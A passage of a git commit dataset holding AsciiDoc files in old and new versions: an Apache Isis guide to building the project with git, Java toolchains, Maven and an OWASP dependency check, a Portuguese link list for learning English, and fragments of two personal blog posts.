As I go about my exceptionally average life, I (like my 7+ billion fellow humans) inevitably accumulate a set of experiences, memories, ideas. __These__ are discrete; I can mentally point to a conversation I've had, or an article I've read, or a place I've been to. In isolation, these \"points\" are hardly worth thinking about, much less writing about. If I led a more interesting life, I could've made this blog a place to simply `Ctrl+C` `Ctrl+V` these experiences\/ideas from my sensory receptors, with a dash of introspection. The analytical analog of an Instagram filter, if you will.\n\nBut for better or worse, my life __is__ pretty mundane, so instead I \n","old_contents":"= Define Extrapolate\n\nExtrapolate is a blog.\n\nNot a travel blog, or a food blog, or a book\/movie review blog, though these are all things that I enjoy and will likely find themselves cameos in posts here and there. Extrapolate isn't a daily\/weekly\/{insert regular time interval}-ly journal blog either, though it might seem like it at times. \n\nExtrapolate is an ongoing record of the more interesting \"ideas\" that find their ways into my mind. I hesitate to use the word \"ideas\" here because (at least in my personal connotation-dictionary) __ideas__ are discrete, and useful in some compacity. The processes that I spend most of my mental CPU on are neither of these. ","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"ff634eb3f54eeb61cd1f42d5caf794873d6ec74b","subject":"ISIS-2290: use AsciiDoc substitutions and aligned monospaced elements","message":"ISIS-2290: use AsciiDoc substitutions and aligned monospaced elements\n","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"antora\/components\/conguide\/modules\/ROOT\/pages\/building-apache-isis.adoc","new_file":"antora\/components\/conguide\/modules\/ROOT\/pages\/building-apache-isis.adoc","new_contents":"[[building-apache-isis]]\n= Building Apache Isis\n:notice: licensed to the apache software foundation (asf) under one or more contributor license agreements. see the notice file distributed with this work for additional information regarding copyright ownership. the asf licenses this file to you under the apache license, version 2.0 (the \"license\"); you may not use this file except in compliance with the license. you may obtain a copy of the license at. http:\/\/www.apache.org\/licenses\/license-2.0 . unless required by applicable law or agreed to in writing, software distributed under the license is distributed on an \"as is\" basis, without warranties or conditions of any kind, either express or implied. see the license for the specific language governing permissions and limitations under the license.\n:page-partial:\n\n\n\n\n\n== Git\n\nThe Apache Isis source code lives in a git repo.\n\n\n=== Installation\n\nThe easiest place to get hold of command-line git is probably the http:\/\/git-scm.com\/downloads[github download page].\n\nOn Windows, this also installs the rather good mSysGit Unix shell. We recommend that you enable git for both the mSysGit and the Windows command prompt:\n\nimage::building-apache-isis\/setting-up-git.png[width=\"350px\",link=\"{imagesdir}\/building-apache-isis\/setting-up-git.png\"]\n\nOnce git is installed, the two main command line tools to note are:\n\n* `git` command line tool\n* `gitk` for viewing the commit history\n\nIf using Windows, note that github also has a dedicated https:\/\/help.github.com\/articles\/set-up-git[Windows client]. 
With a little http:\/\/haacked.com\/archive\/2012\/05\/30\/using-github-for-windows-with-non-github-repositories.aspx[hacking around], it can also be made to work with non-github repositories.\n\nIf using Mac, you might also want to check out Atlassian's http:\/\/www.atlassian.com\/software\/sourcetree\/overview[Sourcetree].\n\n\n\n==== Cloning the Apache Isis repo\n\nFirst, clone the Apache Isis repo:\n\n[source,bash]\n----\ngit clone https:\/\/github.com\/apache\/isis.git\n----\n\n\n==== Configuring Git\n\nNext up is to configure your user name and password:\n\n[source,bash,subs=+quotes]\n----\ngit config user.name \"__My Name Here__\"\ngit config user.email _myusername@apache.org_\n----\n\nNext, configure the `core.autocrlf` so that line endings are normalized to LF (Unix style) in the repo; again see https:\/\/git-wip-us.apache.org\/[Apache's git] page:\n\n\n* on Windows, use: +\n+\n[source,bash]\n----\ngit config core.autocrlf true\n----\n\n* on Mac\/Linux, use: +\n+\n[source,bash]\n----\ngit config core.autocrlf input\n----\n\n\nThe Windows setting means that files are converted back to CRLF on checkout; the Mac\/Linux setting means that the file is left as LF on checkout.\n\nWe also recommend setting `core.safecrlf`, which aims to ensure that any line ending conversion is repeatable. Do this on all platforms:\n\n[source,bash]\n----\ngit config core.safecrlf true\n----\n\n\nNote that these settings are supplemented in the repo by the `.gitattributes` file, which explicitly specifies line handling treatment for most of the common file types that we have.\n\nNext, we recommend you set up a refspec so that you can distinguish remote tags from local ones. To do that, locate the `[remote \"origin\"]` section in your `.git\/config` and add the third entry shown below:\n\n\n[source,bash]\n----\n[remote \"origin\"]\n url = ... whatever ...\n fetch = ... whatever ...\n fetch = +refs\/tags\/*:refs\/tags\/origin\/*\n----\n\n\nThis will ensure that a `git fetch` or `git pull` places any remote tags under `origin\/xxx`. For example, the `isis-1.0.0` tag on the origin will appear under `origin\/isis-1.0.0`.\n\n\nIf you don't use git outside of Apache, you can add the `--global` flag so that the above settings apply for all repos managed by git on your PC.\n\n\n\n=== Getting help\n\nThree git commands in particular are worth knowing:\n\n* `git help _command_` +\n+\nwill open the man page in your web browser\n\n* `git gui` +\n+\nwill open up a basic GUI client for staging changes and making commits.\n\n* `gitk --all` +\n+\nwill open the commit history for all branches. In particular, you should be able to see the local `master`, which branch you are working on (the `HEAD`), and also the last known position of the `master` branch from the central repo, called `origin\/master`.\n\nYou might also want to explore using a freely available equivalent such as link:https:\/\/www.sourcetreeapp.com\/[Atlassian SourceTree].\n\nFor further reading, see:\n\n* http:\/\/www.kernel.org\/pub\/software\/scm\/git\/docs\/git-config.html[git config man page]\n* http:\/\/www.kernel.org\/pub\/software\/scm\/git\/docs\/gitattributes.html[.gitattributes man page]\n* http:\/\/git-scm.com\/docs\/gitattributes[.gitattributes git-scm.com docs]\n\n\n== Installing Java\n\nApache Isis is compatible with Java 7 and Java 8. 
For everyday use, the framework is usually compiled against Java 8.\n\nReleases however are xref:comguide:ROOT:cutting-a-release.adoc[cut] using Java 7, leveraging the link:http:\/\/maven.apache.org\/plugins\/maven-toolchains-plugin\/[Maven toolchains plugin].\n\nTherefore install either\/both of the Java 7 JDK and the Java 8 JDK. Note that the JRE is _not_ sufficient.\n\n[TIP]\n====\nIf you intend to contribute back patches to Apache Isis, note that while you can develop using Java 8 within your IDE,\nbe sure not to use any Java 8 APIs.\n====\n\n=== Configure Maven toolchains plugin\n\nIf you are a committer who will be performing releases of Apache Isis, then you _must_ configure the\nlink:http:\/\/maven.apache.org\/plugins\/maven-toolchains-plugin\/[toolchains] plugin so that releases can be built using\nJava 7.\n\nThis is done by placing the `toolchains.xml` file in the `~\/.m2` directory. Use the following file as a template,\nadjusting paths for your platform:\n\n[source,xml]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<toolchains>\n <toolchain>\n <type>jdk<\/type>\n <provides>\n <version>1.8<\/version>\n <vendor>oracle<\/vendor>\n <\/provides>\n <configuration>\n <jdkHome>\/usr\/lib64\/jvm\/jdk1.8.0_65<\/jdkHome>\n <!--\n <jdkHome>c:\\Program Files\\Java\\jdk1.8.0_65<\/jdkHome>\n -->\n <\/configuration>\n <\/toolchain>\n <toolchain>\n <type>jdk<\/type>\n <provides>\n <version>1.7<\/version> <!--1-->\n <vendor>oracle<\/vendor>\n <\/provides>\n <configuration>\n <jdkHome>\/usr\/lib64\/jvm\/jdk1.7.0_79<\/jdkHome>\n <!--\n <jdkHome>c:\\Program Files\\Java\\jdk1.7.0_79<\/jdkHome>\n -->\n <\/configuration>\n <\/toolchain>\n<\/toolchains>\n----\n<1> The Apache Isis build is configured to search for the (`1.7, oracle`) JDK toolchain.\n\nThe Apache Isis parent `pom.xml` activates this plugin whenever the `apache-release` profile is enabled.\n\n\n\n\n== Installing Maven\n\nInstall Maven 3.0.x, downloadable http:\/\/maven.apache.org\/download.html[here].\n\nSet the `MAVEN_OPTS` environment variable:\n\n[source,bash]\n----\nexport MAVEN_OPTS=\"-Xms512m -Xmx1024m\"\n----\n\n\n\n\n== Building all of Apache Isis\n\nTo build the source code from the command line, simply go to the root directory and type:\n\n[source,bash]\n----\nmvn clean install\n----\n\n\nThe first time you do this, you'll find it takes a while since Maven needs to download all of the Apache Isis prerequisites.\n\nThereafter you can speed up the build by adding the `-o` (offline) flag. To save more time still, we also recommend that you build in parallel. Per this link:http:\/\/zeroturnaround.com\/rebellabs\/your-maven-build-is-slow-speed-it-up\/[blog post], you could also experiment with a number of JDK parameters that we've found also speed up Maven:\n\n[source,bash]\n----\nexport MAVEN_OPTS=\"-Xms512m -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1\"\nmvn clean install -o -T1C\n----\n\nFor the most part, though, you may want to rely on an IDE such as Eclipse to build the codebase for you. Both Eclipse and Idea (12.0+) support incremental background compilation.\n\nWhen using Eclipse, a Maven profile is configured such that Eclipse compiles to the `target-ide` directory rather than the usual `target` directory. 
You can therefore switch between Eclipse and Maven command line without one interfering with the other.\n\n\n\n== Checking for Vulnerabilities\n\nApache Isis configures the link:https:\/\/www.owasp.org\/index.php\/Main_Page[OWASP] link:https:\/\/www.owasp.org\/index.php\/OWASP_Dependency_Check[dependency check] link:http:\/\/jeremylong.github.io\/DependencyCheck\/dependency-check-maven\/index.html[Maven plugin] to determine whether the framework uses libraries that are known to have security vulnerabilities.\n\nTo check, run:\n\n[source,bash]\n----\nmvn org.owasp:dependency-check-maven:aggregate -Dowasp\n----\n\nThis will generate a single report under `target\/dependency-check-report.html`.\n\n\n[NOTE]\n====\nThe first time this runs can take 10~20 minutes to download the NVD data feeds.\n====\n\nTo disable, either run in offline mode (add `-o` or `--offline`) or omit the `owasp` property.\n\n\n\n== Checking for use of internal JDK APIs\n\nApache Isis configures the link:https:\/\/maven.apache.org\/plugins-archives\/maven-jdeps-plugin-3.0.0\/[jdeps maven plugin] to check for any usage of internal JDK APIs. This is in preparation for Java 9 module system (Jigsaw) which will prevent such usage of APIs.\n\nTo check, run:\n\n[source,bash]\n----\nmvn clean install -Djdeps\n----\n\nThis will fail the build on any module that currently uses an internal JDK API.\n\n\n[WARNING]\n====\nAt the time of writing the `isis-core-schema` module fails the build.\n====\n\n\n","old_contents":"[[building-apache-isis]]\n= Building Apache Isis\n:notice: licensed to the apache software foundation (asf) under one or more contributor license agreements. see the notice file distributed with this work for additional information regarding copyright ownership. the asf licenses this file to you under the apache license, version 2.0 (the \"license\"); you may not use this file except in compliance with the license. you may obtain a copy of the license at. http:\/\/www.apache.org\/licenses\/license-2.0 . unless required by applicable law or agreed to in writing, software distributed under the license is distributed on an \"as is\" basis, without warranties or conditions of any kind, either express or implied. see the license for the specific language governing permissions and limitations under the license.\n:page-partial:\n\n\n\n\n\n== Git\n\nThe Apache Isis source code lives in a git repo.\n\n\n=== Installation\n\nThe easiest place to get hold of command-line git is probably the http:\/\/git-scm.com\/downloads[github download page].\n\nOn Windows, this also installs the rather good mSysGit Unix shell. We recommend that you enable git for both the mSysgit and the Windows command prompt:\n\nimage::building-apache-isis\/setting-up-git.png[width=\"350px\",link=\"{imagesdir}\/building-apache-isis\/setting-up-git.png\"]\n\nOnce git is installed, the two main command line tools to note are:\n\n* `git` command line tool\n* `gitk` for viewing the commit history\n\nIf using Windows, note that github also have a dedicated https:\/\/help.github.com\/articles\/set-up-git[Windows client]. 
With a little http:\/\/haacked.com\/archive\/2012\/05\/30\/using-github-for-windows-with-non-github-repositories.aspx[hacking around], it can also be made to work with non-github repositories.\n\nIf using Mac, you might also want to check out Atlassian's http:\/\/www.atlassian.com\/software\/sourcetree\/overview[Sourcetree].\n\n\n\n==== Cloning the Apache Isis repo\n\nFirst, clone the Apache Isis repo:\n\n[source,bash]\n----\ngit clone https:\/\/github.com\/apache\/isis.git\n----\n\n\n==== Configuring Git\n\nNext up is to configure your user name and password:\n\n[source,bash]\n----\ngit config user.name \"<i>My Name Here<\/i>\"\ngit config user.email <i>myusername@apache.org<\/i>\n----\n\nNext, configure the `core.autocrlf` so that line endings are normalized to LF (Unix style) in the rep; again see https:\/\/git-wip-us.apache.org\/[Apache's git] page:\n\n\n* on Windows, use: +\n+\n[source,bash]\n----\ngit config core.autocrlf true\n----\n\n* on Mac\/Linux, use: +\n+\n[source,bash]\n----\ngit config core.autocrlf input\n----\n\n\nThe Windows setting means that files are converted back to CRLF on checkout; the Mac\/Linux setting means that the file is left as LF on checkout.\n\nWe also recommend setting `core.safecrlf`, which aims to ensure that any line ending conversion is repeatable. Do this on all platforms:\n\n[source,bash]\n----\ngit config core.safecrlf true\n----\n\n\nNote that these settings are supplemented in the repo by the `.gitattributes` file and that explicitly specifies line handling treatment for most of the common file types that we have.\n\nNext, we recommend you setup this a refspec so that you can distinguish remote tags from local ones. To do that, locate the `[remote "origin"]` section in your `.git\/config` and add the third entry shown below:\n\n\n[source,bash]\n----\n[remote \"origin\"]\n url = ... whatever ...\n fetch = ... whatever ...\n fetch = +refs\/tags\/*:refs\/tags\/origin\/*\n----\n\n\nThis will ensure that a `git fetch` or `git pull` places any remote tags under `origin\/xxx. For example, the`isis-1.0.0`tag on the origin will appear under`origin\/isis-1.0.0`.\n\n\nIf you don't use git outside of Apache, you can add the `--global` flag so that the above settings apply for all repos managed by git on your PC.\n\n\n\n=== Getting help\n\nThree commands of git that in particular worth knowing:\n\n* `git help _command_` +\n+\nwill open the man page in your web browser\n\n* `git gui` +\n+\nwill open up a basic GUI client to staging changes and making commits.\n\n* `gitk --all` +\n+\nwill open the commit history for all branches. In particular, you should be able to see the local `master`, which branch you are working on (the `HEAD`), and also the last known position of the `master` branch from the central repo, called `origin\/master`.\n\nYou might also want to explore using a freely available equivalent such as link:https:\/\/www.sourcetreeapp.com\/[Atlassian SourceTree].\n\nFor further reading, see:\n\n* http:\/\/www.kernel.org\/pub\/software\/scm\/git\/docs\/git-config.html[git config man page]\n* http:\/\/www.kernel.org\/pub\/software\/scm\/git\/docs\/gitattributes.html[.gitattributes man page]\n* http:\/\/git-scm.com\/docs\/gitattributes[.gitattributes git-scm.com docs]\n\n\n== Installing Java\n\nApache Isis is compatible with Java 7 and Java 8. 
For every-day use, the framework is usually compiled against Java 8.\n\nReleases however are xref:comguide:ROOT:cutting-a-release.adoc[cut] using Java 7, leveraging the link:http:\/\/maven.apache.org\/plugins\/maven-toolchains-plugin\/[Maven toolchains plugin]).\n\nTherefore install either\/both of Java 7 JDK and Java 8 JDK. Note that the JRE is _not_ sufficient.\n\n[TIP]\n====\nIf you intend to contribute back patches to Apache Isis, note that while you can develop using Java 8 within your IDE,\nbe sure not to use any Java 8 APIs.\n====\n\n=== Configure Maven toolchains plugin\n\nIf you are a committer that will be performing releases of Apache Isis, then you _must_ configure the\nlink:http:\/\/maven.apache.org\/plugins\/maven-toolchains-plugin\/[toolchains] plugin so that releases can be built using\nJava 7.\n\nThis is done by placing the `toolchains.xml` file in `~\/.m2` directory. Use the following file as a template,\nadjusting paths for your platform:\n\n[source,xml]\n----\n<?xml version=\"1.0\" encoding=\"UTF8\"?>\n<toolchains>\n <toolchain>\n <type>jdk<\/type>\n <provides>\n <version>1.8<\/version>\n <vendor>oracle<\/vendor>\n <\/provides>\n <configuration>\n <jdkHome>\/usr\/lib64\/jvm\/jdk1.8.0_65<\/jdkHome>\n <!--\n <jdkHome>c:\\Program Files\\Java\\jdk1.8.0_65<\/jdkHome>\n -->\n <\/configuration>\n <\/toolchain>\n <toolchain>\n <type>jdk<\/type>\n <provides>\n <version>1.7<\/version> <!--1-->\n <vendor>oracle<\/vendor>\n <\/provides>\n <configuration>\n <jdkHome>\/usr\/lib64\/jvm\/jdk1.7.0_79<\/jdkHome>\n <!--\n <jdkHome>c:\\Program Files\\Java\\jdk1.7.0_79<\/jdkHome>\n -->\n <\/configuration>\n <\/toolchain>\n<\/toolchains>\n----\n<1> The Apache Isis build is configured to search for the (`1.7, oracle`) JDK toolchain.\n\nThe Apache Isis parent `pom.xml` activates this plugin whenever the `apache-release` profile is enabled.\n\n\n\n\n== Installing Maven\n\nInstall Maven 3.0.x, downloadable http:\/\/maven.apache.org\/download.html[here].\n\nSet `MAVEN_OPTS` environment variable:\n\n[source,bash]\n----\nexport MAVEN_OPTS=\"-Xms512m -Xmx1024m\"\n----\n\n\n\n\n== Building all of Apache Isis\n\nTo build the source code from the command line, simply go to the root directory and type:\n\n[source,bash]\n----\nmvn clean install\n----\n\n\nThe first time you do this, you'll find it takes a while since Maven needs to download all of the Apache Isis prerequisites.\n\nThereafter you can speed up the build by adding the `-o` (offline flag). To save more time still, we also recommend that you build in parallel. (Per this link:http:\/\/zeroturnaround.com\/rebellabs\/your-maven-build-is-slow-speed-it-up\/[blog post]), you could also experiment with a number of JDK parameters that we've found also speed up Maven:\n\n[source,bash]\n----\nexport MAVEN_OPTS=\"-Xms512m -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1\"\nmvn clean install -o -T1C\n----\n\nFor the most part, though, you may want to rely on an IDE such as Eclipse to build the codebase for you. Both Eclipse and Idea (12.0+) support incremental background compilation.\n\nWhen using Eclipse, a Maven profile is configured such that Eclipse compiles to `target-ide` directory rather than the usual `target` directory. 
You can therefore switch between Eclipse and Maven command line without one interfering with the other.\n\n\n\n== Checking for Vulnerabilities\n\nApache Isis configures the link:https:\/\/www.owasp.org\/index.php\/Main_Page[OWASP] link:https:\/\/www.owasp.org\/index.php\/OWASP_Dependency_Check[dependency check] link:http:\/\/jeremylong.github.io\/DependencyCheck\/dependency-check-maven\/index.html[Maven plugin] to determine whether the framework uses libraries that are known to have security vulnerabilities.\n\nTo check, run:\n\n[source,bash]\n----\nmvn org.owasp:dependency-check-maven:aggregate -Dowasp\n----\n\nThis will generate a single report under `target\/dependency-check-report.html`.\n\n\n[NOTE]\n====\nThe first time this runs can take 10~20 minutes to download the NVD data feeds.\n====\n\nTo disable, either run in offline mode (add `-o` or `--offline`) or omit the `owasp` property.\n\n\n\n== Checking for use of internal JDK APIs\n\nApache Isis configures the link:https:\/\/maven.apache.org\/plugins-archives\/maven-jdeps-plugin-3.0.0\/[jdeps maven plugin] to check for any usage of internal JDK APIs. This is in preparation for Java 9 module system (Jigsaw) which will prevent such usage of APIs.\n\nTo check, run:\n\n[source,bash]\n----\nmvn clean install -Djdeps\n----\n\nThis will fail the build on any module that currently uses an internal JDK API.\n\n\n[WARNING]\n====\nAt the time of writing the `isis-core-schema` module fails the build.\n====\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"63023a8831a0488967cb42c5950b328f5f9b28a4","subject":"Update 2017-01-04-Keep-English-Learn.adoc","message":"Update 2017-01-04-Keep-English-Learn.adoc","repos":"raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io","old_file":"_posts\/2017-01-04-Keep-English-Learn.adoc","new_file":"_posts\/2017-01-04-Keep-English-Learn.adoc","new_contents":"= Keep: English Learn\n:icons: font\n:published_at: 2017-01-04\n:hp-tags: keep, notes, english, learn, links\n---\n\n++++\n<iframe width=\"854\" height=\"480\" src=\"https:\/\/www.youtube.com\/embed\/1xsyULVN6UU?ecver=1\" frameborder=\"0\" allowfullscreen><\/iframe>\n++++\n\n#*Iniciante*#\n\n1. https:\/\/www.udemy.com\/cursodeinglesbasico25\/[Curso de Ingl\u00eas B\u00e1sico Come\u00e7ando de Zero Entenda 25%]\n1. https:\/\/www.duolingo.com\/[Duolingo]\n1. https:\/\/www.memrise.com\/[Memrise]\n1. http:\/\/aulasdeinglesgratis.net\/textos-em-ingles-para-iniciantes-com-audio\/[Textos em Ingl\u00eas para Iniciante]\n\n#*B\u00e1sico*#\n\n1. https:\/\/www.youtube.com\/playlist?list=PLo_-eIfuDFyFGfQihJwQT6dTO42E7IZvv[Canal do Beto Ferreira - N\u00edvel B\u00e1sico]\n1. https:\/\/www.youtube.com\/playlist?list=PL7BDB07039775D0A6[Canal Ingl\u00eas Winner - N\u00edvel B\u00e1sico]\n1. https:\/\/play.google.com\/store\/apps\/details?id=br.com.ingleswinner[App do Ingl\u00eas Winner - Acesso a todas as aulas]\n1. http:\/\/www.mairovergara.com\/caigdg[Guia Definitivo - Mairo Vergara]\n1. https:\/\/www.youtube.com\/user\/MairoVergara\/playlists[Mini-aulas e Dicas de Ingl\u00eas - Mairo Vergara]\n1. http:\/\/www.fiction.us\/[Livros \/ Dicion\u00e1rio ou tradutor para analisar pronuncia]\n\n\n#*Conversa\u00e7\u00e3o*#\n\n1. https:\/\/www.eslpod.com\/website\/show_all.php?cat_id=-39570#[Podcast - Want to be Fluent in English?]\n1. http:\/\/aprenderpalavras.com\/curso-de-ingles-mairo-vergara\/[Curso Mairo Vergara 3.0 - Pago ou Deep Web]\n1. 
http:\/\/aulasdeinglesgratis.net\/100-conversacoes-em-ingles\/[100 Conversa\u00e7\u00f5es - Texto EN\/PT]\n1. http:\/\/aulasdeinglesgratis.net\/100-textos-em-ingles-com-traducao-e-audio\/[Textos em Ingl\u00easPortugu\u00eas e \u00c1udio]\n1. https:\/\/www.youtube.com\/channel\/UCGxIAAnrhkCy6H2DRz-t6Qw[Aprenda Ingl\u00eas se Divertindo - Tim Explica (Gringo)]\n1. https:\/\/www.edx.org\/course\/conversational-english-skills-tsinghuax-30640014x-1[Conversational English Skills (EDX)]\n\n#*Complemento*#\n\n*_Ingl\u00eas com Seriados (Friends, How i met your Mother, Everybody hates Chris e My Wife & Kids)_*\n\n1. *M\u00e9todo*:\n- Passo 1 - Dublagem original \/ Legenda Portugu\u00eas\n- Passo 2 - Dublagem original \/ Legenda Ingl\u00eas\n- Passo 3 - Dublagem original \/ Sem legenda\n\n*_Ingl\u00eas com Filmes (Matrix, (500) Days of Summer, Toy Store, Para Sempre Alice, Harry Potter e The GodFather)_*\n\n1. *M\u00e9todo*: _O mesmo usado para seriados, mas pode ser aplicado apenas em cenas com bastante dialogo._ \n\n\t- Passo 1 - Dublagem original \/ Legenda Portugu\u00eas \n\t- Passo 2 - Dublagem original \/ Legenda Ingl\u00eas\n\t- Passo 3 - Dublagem original \/ Sem legenda\n\n#*Vlogs\/Canais*#\n\n1. https:\/\/www.youtube.com\/user\/schooloflifechannel\/playlists[School of Life]\n1. https:\/\/www.youtube.com\/user\/crashcourse\/playlists[Crash Course]\n1. https:\/\/www.youtube.com\/channel\/UC2vUKoTGIwNYq4LO0YWKPIg[Youtuber Gamer - HappyConsoleGamer]\n1. https:\/\/www.youtube.com\/channel\/UC3LqW4ijMoENQ2Wv17ZrFJA[Cultura Pop - PBS Idea Channel]\n1. https:\/\/www.youtube.com\/user\/scishow\/featured[Science Channel - SciShow]\n\n#*Canais no Youtube*#\n\n1. https:\/\/www.youtube.com\/watch?v=RY1r70I_Doo[Felipe Neto: COMO EU APRENDI INGL\u00caS (E VOC\u00ca TAMB\u00c9M VAI APRENDER)]\n\n1. https:\/\/www.youtube.com\/channel\/UCDyjlawtWnY7j1C2RyObZlg[Mairo Vergara]\n1. https:\/\/www.youtube.com\/channel\/UCNirOQBP88BVoRZD0GtS9xQ[Canal do Paulo Nideck]\n1. https:\/\/www.youtube.com\/channel\/UCskEPRzGlsYHs_a5SJyCXag[Canal SmallAdvantages]\n1. https:\/\/www.youtube.com\/channel\/UC15HDk6sVZvWFomxNTMr3zw[Canal Cintia disse]\n1. https:\/\/www.youtube.com\/channel\/UCcNm9fM9V5wf-0PZVmkM08g[Carina Fragozo]\n1. https:\/\/www.youtube.com\/channel\/UCX1Khol-7w7ZUbDPngo_-0g[Canal Juliana Selem]\n1. https:\/\/www.youtube.com\/channel\/UCVBErcpqaokOf4fI5j73K_w[Learn English with Emma [engVid]]\n\n#*Extens\u00f5es do Chrome*#\n\n1. https:\/\/chrome.google.com\/webstore\/detail\/google-dictionary-by-goog\/mgijmajocgfcbeboacabfgobmjgjcoja[Google Dictionary (by Google)]\n1. https:\/\/chrome.google.com\/webstore\/detail\/grammarly-for-chrome\/kbfnbcaeplbcioakkpcpgfkobkghlhen[Grammarly for Chrome]\n\n\n\n> Fonte https:\/\/goo.gl\/oeWUdp[Lucas Santana]","old_contents":"= Keep: English Learn\n:icons: font\n:published_at: 2017-01-04\n:hp-tags: keep, notes, english, learn, links\n---\n\n#*Iniciante*#\n\n1. https:\/\/www.udemy.com\/cursodeinglesbasico25\/[Curso de Ingl\u00eas B\u00e1sico Come\u00e7ando de Zero Entenda 25%]\n1. https:\/\/www.duolingo.com\/[Duolingo]\n1. https:\/\/www.memrise.com\/[Memrise]\n1. http:\/\/aulasdeinglesgratis.net\/textos-em-ingles-para-iniciantes-com-audio\/[Textos em Ingl\u00eas para Iniciante]\n\n#*B\u00e1sico*#\n\n1. https:\/\/www.youtube.com\/playlist?list=PLo_-eIfuDFyFGfQihJwQT6dTO42E7IZvv[Canal do Beto Ferreira - N\u00edvel B\u00e1sico]\n1. https:\/\/www.youtube.com\/playlist?list=PL7BDB07039775D0A6[Canal Ingl\u00eas Winner - N\u00edvel B\u00e1sico]\n1. 
https:\/\/play.google.com\/store\/apps\/details?id=br.com.ingleswinner[App do Ingl\u00eas Winner - Acesso a todas as aulas]\n1. http:\/\/www.mairovergara.com\/caigdg[Guia Definitivo - Mairo Vergara]\n1. https:\/\/www.youtube.com\/user\/MairoVergara\/playlists[Mini-aulas e Dicas de Ingl\u00eas - Mairo Vergara]\n1. http:\/\/www.fiction.us\/[Livros \/ Dicion\u00e1rio ou tradutor para analisar pronuncia]\n\n\n#*Conversa\u00e7\u00e3o*#\n\n1. https:\/\/www.eslpod.com\/website\/show_all.php?cat_id=-39570#[Podcast - Want to be Fluent in English?]\n1. http:\/\/aprenderpalavras.com\/curso-de-ingles-mairo-vergara\/[Curso Mairo Vergara 3.0 - Pago ou Deep Web]\n1. http:\/\/aulasdeinglesgratis.net\/100-conversacoes-em-ingles\/[100 Conversa\u00e7\u00f5es - Texto EN\/PT]\n1. http:\/\/aulasdeinglesgratis.net\/100-textos-em-ingles-com-traducao-e-audio\/[Textos em Ingl\u00easPortugu\u00eas e \u00c1udio]\n1. https:\/\/www.youtube.com\/channel\/UCGxIAAnrhkCy6H2DRz-t6Qw[Aprenda Ingl\u00eas se Divertindo - Tim Explica (Gringo)]\n1. https:\/\/www.edx.org\/course\/conversational-english-skills-tsinghuax-30640014x-1[Conversational English Skills (EDX)]\n\n#*Complemento*#\n\n*_Ingl\u00eas com Seriados (Friends, How i met your Mother, Everybody hates Chris e My Wife & Kids)_*\n\n1. *M\u00e9todo*:\n- Passo 1 - Dublagem original \/ Legenda Portugu\u00eas\n- Passo 2 - Dublagem original \/ Legenda Ingl\u00eas\n- Passo 3 - Dublagem original \/ Sem legenda\n\n*_Ingl\u00eas com Filmes (Matrix, (500) Days of Summer, Toy Store, Para Sempre Alice, Harry Potter e The GodFather)_*\n\n1. *M\u00e9todo*: _O mesmo usado para seriados, mas pode ser aplicado apenas em cenas com bastante dialogo._ \n\n\t- Passo 1 - Dublagem original \/ Legenda Portugu\u00eas \n\t- Passo 2 - Dublagem original \/ Legenda Ingl\u00eas\n\t- Passo 3 - Dublagem original \/ Sem legenda\n\n#*Vlogs\/Canais*#\n\n1. https:\/\/www.youtube.com\/user\/schooloflifechannel\/playlists[School of Life]\n1. https:\/\/www.youtube.com\/user\/crashcourse\/playlists[Crash Course]\n1. https:\/\/www.youtube.com\/channel\/UC2vUKoTGIwNYq4LO0YWKPIg[Youtuber Gamer - HappyConsoleGamer]\n1. https:\/\/www.youtube.com\/channel\/UC3LqW4ijMoENQ2Wv17ZrFJA[Cultura Pop - PBS Idea Channel]\n1. https:\/\/www.youtube.com\/user\/scishow\/featured[Science Channel - SciShow]\n\n#*Canais no Youtube*#\n\n1. https:\/\/www.youtube.com\/watch?v=RY1r70I_Doo[Felipe Neto: COMO EU APRENDI INGL\u00caS (E VOC\u00ca TAMB\u00c9M VAI APRENDER)]\n\n1. https:\/\/www.youtube.com\/channel\/UCDyjlawtWnY7j1C2RyObZlg[Mairo Vergara]\n1. https:\/\/www.youtube.com\/channel\/UCNirOQBP88BVoRZD0GtS9xQ[Canal do Paulo Nideck]\n1. https:\/\/www.youtube.com\/channel\/UCskEPRzGlsYHs_a5SJyCXag[Canal SmallAdvantages]\n1. https:\/\/www.youtube.com\/channel\/UC15HDk6sVZvWFomxNTMr3zw[Canal Cintia disse]\n1. https:\/\/www.youtube.com\/channel\/UCcNm9fM9V5wf-0PZVmkM08g[Carina Fragozo]\n1. https:\/\/www.youtube.com\/channel\/UCX1Khol-7w7ZUbDPngo_-0g[Canal Juliana Selem]\n1. https:\/\/www.youtube.com\/channel\/UCVBErcpqaokOf4fI5j73K_w[Learn English with Emma [engVid]]\n\n#*Extens\u00f5es do Chrome*#\n\n1. https:\/\/chrome.google.com\/webstore\/detail\/google-dictionary-by-goog\/mgijmajocgfcbeboacabfgobmjgjcoja[Google Dictionary (by Google)]\n1. 
https:\/\/chrome.google.com\/webstore\/detail\/grammarly-for-chrome\/kbfnbcaeplbcioakkpcpgfkobkghlhen[Grammarly for Chrome]\n\n\n\n> Fonte https:\/\/goo.gl\/oeWUdp[Lucas Santana]","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"e4b29ed49de690e1b9b507dd2287e3cd12c1742a","subject":"Update 2017-01-23-DER-TEXT-ALS-AUTOR.adoc","message":"Update 2017-01-23-DER-TEXT-ALS-AUTOR.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-01-23-DER-TEXT-ALS-AUTOR.adoc","new_file":"_posts\/2017-01-23-DER-TEXT-ALS-AUTOR.adoc","new_contents":"# DER TEXT ALS AUTOR\n:hp-tags: autor, forschung, originalgenie, text, wissenschaft\n:published_at: 2017-01-23\n\nWEITERER TEXT \u00dcBER DAS ORIGINALGENIE\n\n____\n\n\u00bbMittelalterliche Textgepflogenheiten, die das Buch selbst wie einen Autor sprechen lassen, haben den Buchdruck nicht \u00fcberlebt. Es w\u00e4re nicht ganz abwegig, sie wiederaufzugreifen, denn schlie\u00dflich stammt, jedenfalls wo es \u203awissenschaftlich\u2039 zugeht, nur sehr weniges, was in einem Buch 